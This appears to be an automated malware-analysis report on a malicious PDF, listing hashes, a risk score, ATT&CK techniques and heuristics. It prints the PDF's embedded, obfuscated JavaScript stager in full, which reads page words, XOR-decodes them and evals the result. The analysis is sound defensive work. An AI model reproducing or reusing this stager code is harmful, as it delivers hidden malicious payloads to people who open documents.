Malicious PDF — malware analysis report

Static analysis result for SHA-256 934fe64c44e00c0d…

MALICIOUS

PDF

5.6 KB Authoring application: Jidagelageno (via a5c5bYlojoppekaxopqi) First seen: 2026-05-08
MD5: 6da13d9131b29903b06eb8b57152243b SHA-1: 78ebda7e8ada1f5c0e56cf521902fbdae175537e SHA-256: 934fe64c44e00c0dc7dd56871da09d9d36d0e56ca5b10185b2e481d4f8e824af
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript, identified by the 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_PAGE_WORD_XOR_EVAL_STAGER' heuristics. The stager is designed to execute JavaScript, which is a common technique for downloading and executing further malicious content. The authoring application metadata also provides potential indicators.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0xF52 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
var rM='';
var n=String("leng"+"th");
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
var yL=/[q4\$9LR]/g;
var lS="pro"+"tot"+"ype";
var yR=new String("eva"+"l");
var cZ="rep"+"lac"+"e";
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


xQN=xQN[cZ](yL, rM);

var rG=this;
cH=5603;cH++;
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
var kN=0;
;


var bCD=new hE(rG,xQN);
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;